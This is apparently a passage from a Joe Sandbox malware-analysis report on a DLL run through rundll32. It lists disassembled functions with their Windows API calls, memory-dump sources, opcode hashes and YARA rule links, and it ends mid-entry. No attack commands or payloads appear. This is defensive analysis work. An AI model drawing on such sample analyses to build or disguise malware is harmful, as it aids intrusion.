                                                                                                                                  • Instruction ID: d676a82d7887273777baca2e38fe8b62e8198389fbfbdcd46b7f1d18b22838b9
                                                                                                                                  • Opcode Fuzzy Hash: 53b3a67e4a4930d6f35b53cf06474ecb6a52427011bba0ba31954c8fd7e85df7
                                                                                                                                  • Instruction Fuzzy Hash: 92012236001A2ABBCF129F919D05EDE3B6AEF49394F004010FE0069120D736C9A2EBA6
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 1001B32D Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetDlgItem.USER32(?,?), ref: 1001B338
                                                                                                                                  • GetTopWindow.USER32(00000000), ref: 1001B34B
                                                                                                                                    • Part of subcall function 1001B32D: GetWindow.USER32(00000000,00000002), ref: 1001B392
                                                                                                                                  • GetTopWindow.USER32(?), ref: 1001B37B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Item
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 369458955-0
                                                                                                                                  • Opcode ID: 9be62a33154ecf838a8ec693ceb269fba071d7fc85a8faced3965e2d85c2953e
                                                                                                                                  • Instruction ID: 858530c175d9441ab3e78fa875986bdb84c423c322646567b0054cf47e6755e0
                                                                                                                                  • Opcode Fuzzy Hash: 9be62a33154ecf838a8ec693ceb269fba071d7fc85a8faced3965e2d85c2953e
                                                                                                                                  • Instruction Fuzzy Hash: 4D01A236101E6AF7DB129F618D05E8F3B99EF453E4F024010FD249D120DB71DBB196A1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 1003C9F5 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3016257755-0
                                                                                                                                  • Opcode ID: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
                                                                                                                                  • Instruction ID: 43f41ac90f78858b98c9d7795bb0f5538c3c8e7231dcd18d5b884ccf0efad8a7
                                                                                                                                  • Opcode Fuzzy Hash: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
                                                                                                                                  • Instruction Fuzzy Hash: 78013D3640054EBFCF139F86DC41CEE3F66FB19295F558415FA1898121C636DAB1AB82
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 1002BC31 Relevance: 6.0, APIs: 4, Instructions: 48memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SysStringLen.OLEAUT32(?), ref: 1002BC45
                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,0000000C,1002D018,00000000,00000018,1002D35E), ref: 1002BC5D
                                                                                                                                  • SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 1002BC65
                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000,?,?,0000000C,1002D018,00000000,00000018,1002D35E), ref: 1002BC84
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Byte$CharMultiStringWide$Alloc
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3384502665-0
                                                                                                                                  • Opcode ID: 30c8667133e0e99acdefb8fda4e094958d0ee3b60e94751be478a45e222a3836
                                                                                                                                  • Instruction ID: 8ac585039279df4530c17525e78cb38a3c471deb65f2ee77315d7d06ea712387
                                                                                                                                  • Opcode Fuzzy Hash: 30c8667133e0e99acdefb8fda4e094958d0ee3b60e94751be478a45e222a3836
                                                                                                                                  • Instruction Fuzzy Hash: 15F09671106774BF932157629D8CC9BBF9CFE8F3F5B11052AF549C2100D6629800C6F5
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 1003A545 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 100352EC: __getptd_noexit.LIBCMT ref: 100352ED
                                                                                                                                    • Part of subcall function 100352EC: __amsg_exit.LIBCMT ref: 100352FA
                                                                                                                                  • __amsg_exit.LIBCMT ref: 1003A571
                                                                                                                                  • __lock.LIBCMT ref: 1003A581
                                                                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 1003A59E
                                                                                                                                  • InterlockedIncrement.KERNEL32(02701520), ref: 1003A5C9
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2880340415-0
                                                                                                                                  • Opcode ID: 77ce0df2017148a369788d84d5d9eaff25b7537eedda72ae9a584ccf42c9de33
                                                                                                                                  • Instruction ID: 227b034a2befce0e561f83ae0ba5e63d07179ac23aa6a18c45afd9c28011782e
                                                                                                                                  • Opcode Fuzzy Hash: 77ce0df2017148a369788d84d5d9eaff25b7537eedda72ae9a584ccf42c9de33
                                                                                                                                  • Instruction Fuzzy Hash: B2016D35D01E21EFEB42DB65884575D77A0FF067A3F510105E800AF291DB25BA81CBD6
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 1001DC85 Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • FindResourceA.KERNEL32 ref: 1001DCA7
                                                                                                                                  • LoadResource.KERNEL32(?,00000000,?,?,?,?,1001703A,?,?,100128C0,4CC2CB6B), ref: 1001DCB3
                                                                                                                                  • LockResource.KERNEL32(00000000,?,?,?,?,1001703A,?,?,100128C0,4CC2CB6B), ref: 1001DCC0
                                                                                                                                  • FreeResource.KERNEL32(00000000,00000000,?,?,?,?,1001703A,?,?,100128C0,4CC2CB6B), ref: 1001DCDB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Resource$FindFreeLoadLock
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1078018258-0
                                                                                                                                  • Opcode ID: b40af9f0dfb9db239089461bda16c39fe6d8ad8ad62dd4b4922628693a12339f
                                                                                                                                  • Instruction ID: 2e1bb7004ec06de307aa608eb86a555f9a12e1d63b329185fddd1afba3e53365
                                                                                                                                  • Opcode Fuzzy Hash: b40af9f0dfb9db239089461bda16c39fe6d8ad8ad62dd4b4922628693a12339f
                                                                                                                                  • Instruction Fuzzy Hash: 74F09676301A126B93417B654E84A7BBB9CEFC65A2701013AFE05D7211EEB1CC45C2A6
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 100174CD Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • EnableWindow.USER32(000000FF,00000001), ref: 100174ED
                                                                                                                                  • GetActiveWindow.USER32 ref: 100174F8
                                                                                                                                  • SetActiveWindow.USER32(000000FF), ref: 10017506
                                                                                                                                  • FreeResource.KERNEL32(00000008,?,00000024,100010EC,00000000,10046640), ref: 10017522
                                                                                                                                    • Part of subcall function 1001DECA: EnableWindow.USER32(?,10046640), ref: 1001DED7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$ActiveEnable$FreeResource
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 253586258-0
                                                                                                                                  • Opcode ID: eb27006848965884004c9991400e475c3ac81a8aa5cc97471f58b07f94fae74b
                                                                                                                                  • Instruction ID: b8177a2bef97c6db83ac0ed626da55a545c9139c8ac7342270f03f66935dd0b6
                                                                                                                                  • Opcode Fuzzy Hash: eb27006848965884004c9991400e475c3ac81a8aa5cc97471f58b07f94fae74b
                                                                                                                                  • Instruction Fuzzy Hash: C5F03C34900A15CFDF12EB64CD8559DBBF2FF88702B100115E446BA161DB72AD80CE16
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 1002E206 Relevance: 6.0, APIs: 4, Instructions: 21COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 1002E228
                                                                                                                                  • GetTickCount.KERNEL32 ref: 1002E235
                                                                                                                                  • CoFreeUnusedLibraries.OLE32 ref: 1002E244
                                                                                                                                  • GetTickCount.KERNEL32 ref: 1002E24A
                                                                                                                                    • Part of subcall function 1002E1AF: CoFreeUnusedLibraries.OLE32 ref: 1002E1F3
                                                                                                                                    • Part of subcall function 1002E1AF: OleUninitialize.OLE32 ref: 1002E1F9
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountTick$FreeLibrariesUnused$Uninitialize
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 685759847-0
                                                                                                                                  • Opcode ID: 5645409a338d605000a15fbb944d62efc2c9a6456e8d0e25dbd15ca34f7d067c
                                                                                                                                  • Instruction ID: b81a2157dff59843e5c721b5fa459b83a8bef19e296eb3c7ce89af4ff474d23a
                                                                                                                                  • Opcode Fuzzy Hash: 5645409a338d605000a15fbb944d62efc2c9a6456e8d0e25dbd15ca34f7d067c
                                                                                                                                  • Instruction Fuzzy Hash: 3BE012358D42B4CBFB04FB20ED883A93BE8FB46305F514527D04692165DB346C59DF52
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 10027CC2 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 170COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClearVariant
                                                                                                                                  • String ID: (
                                                                                                                                  • API String ID: 1473721057-3887548279
                                                                                                                                  • Opcode ID: 008ec943e52341c0dca71a05145884f93f6144af570bd047c2597266c283ece8
                                                                                                                                  • Instruction ID: 55505e3d54abccaab23e3fb35bc0536c28338c561f08ce7921e5662988eb51c3
                                                                                                                                  • Opcode Fuzzy Hash: 008ec943e52341c0dca71a05145884f93f6144af570bd047c2597266c283ece8
                                                                                                                                  • Instruction Fuzzy Hash: 52517A75600B11DFCB64CF68D9C2A2AB7F5FF48314B904A6DE5868BA52C770F981CB50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 100259EE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 150COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: H_prolog3
                                                                                                                                  • String ID: @
                                                                                                                                  • API String ID: 431132790-2766056989
                                                                                                                                  • Opcode ID: 154d677d06bdea17fd7c180cae35ab477e1537548e58b8b808fb5212b96a33b2
                                                                                                                                  • Instruction ID: 3c539a28780873688809e1a5131d88fd7e7c20f84f620333ebd6e4501b894ad0
                                                                                                                                  • Opcode Fuzzy Hash: 154d677d06bdea17fd7c180cae35ab477e1537548e58b8b808fb5212b96a33b2
                                                                                                                                  • Instruction Fuzzy Hash: 2951D5B0A0020A9FDB04CFA8C8D8AEEB7F9FF48305F50456AE516EB251E775A945CF50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 1001508F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 100150B5
                                                                                                                                  • PathFindExtensionA.SHLWAPI(?), ref: 100150CB
                                                                                                                                    • Part of subcall function 10014B27: _strcpy_s.LIBCMT ref: 10014B33
                                                                                                                                    • Part of subcall function 10014DA8: __EH_prolog3.LIBCMT ref: 10014DC7
                                                                                                                                    • Part of subcall function 10014DA8: GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 10014DE8
                                                                                                                                    • Part of subcall function 10014DA8: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10014DF9
                                                                                                                                    • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(?), ref: 10014E2F
                                                                                                                                    • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(?), ref: 10014E37
                                                                                                                                    • Part of subcall function 10014DA8: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10014E4B
                                                                                                                                    • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(?), ref: 10014E6F
                                                                                                                                    • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(000003FF), ref: 10014E75
                                                                                                                                    • Part of subcall function 10014DA8: GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10014EAE
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3HandlePath_strcpy_s
                                                                                                                                  • String ID: %s.dll
                                                                                                                                  • API String ID: 3444012488-3668843792
                                                                                                                                  • Opcode ID: 658e8660b57156c47c50295d269887a352ab673736f5c816275cebcb6cd6bc48
                                                                                                                                  • Instruction ID: 0816ccb3c2c5dc3d5c2f43fd153125c4ae2bbce82e663fde520804fb1fdab18a
                                                                                                                                  • Opcode Fuzzy Hash: 658e8660b57156c47c50295d269887a352ab673736f5c816275cebcb6cd6bc48
                                                                                                                                  • Instruction Fuzzy Hash: 9901B971A10118BBDF09DB74DD96AEEB3B8DF04B01F0105E9EA02DB140EEB1EE448A61
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 10001FF0 Relevance: 5.2, APIs: 4, Instructions: 181COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • IsBadReadPtr.KERNEL32(00000000,00000014,?,?,?,?,100025CE,00000000,00000000), ref: 10002045
                                                                                                                                  • SetLastError.KERNEL32(0000007E), ref: 10002087
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastRead
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4100373531-0
                                                                                                                                  • Opcode ID: b6f425d35b460735779e1ed3fb281948f59bf2ef0f2add24d18ae520f481b1e4
                                                                                                                                  • Instruction ID: bdea880ba7c0c5bd5d2dbe714977ff7d927dc75702b615567210b407e242d671
                                                                                                                                  • Opcode Fuzzy Hash: b6f425d35b460735779e1ed3fb281948f59bf2ef0f2add24d18ae520f481b1e4
                                                                                                                                  • Instruction Fuzzy Hash: B181A8B4A00209EFDB04CF94C980AAEB7B1FF48354F248159E919AB355D735EE82CF94
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 10020B38 Relevance: 5.1, APIs: 4, Instructions: 60COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 10020B95
                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?), ref: 10020BA5
                                                                                                                                  • LocalFree.KERNEL32(?), ref: 10020BAE
                                                                                                                                  • TlsSetValue.KERNEL32(?,00000000), ref: 10020BC0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$EnterFreeLeaveLocalValue
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2949335588-0
                                                                                                                                  • Opcode ID: 6676c0264c2eb297a537204f12f4d5c162c59b7e83937d8b07f604b269a52a54
                                                                                                                                  • Instruction ID: af4df8c6ab00e3b134578f48d56f113cbd39bdf93991f651abc1e22c3acb8acd
                                                                                                                                  • Opcode Fuzzy Hash: 6676c0264c2eb297a537204f12f4d5c162c59b7e83937d8b07f604b269a52a54
                                                                                                                                  • Instruction Fuzzy Hash: 70113435600305EFE721CF54D9C4B9AB7AAFF0A35AF508429F5528B5A2DB71F980CB50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 10020E5D Relevance: 5.0, APIs: 4, Instructions: 37COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020E99
                                                                                                                                  • InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EA8
                                                                                                                                  • LeaveCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EB5
                                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EC1
                                                                                                                                    • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$Enter$Exception@8InitializeLeaveThrow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3253506028-0
                                                                                                                                  • Opcode ID: cf9bd6703211ded15ebc294ea5b4eaffa7e14a09b8c66129e44fb6711d6d5733
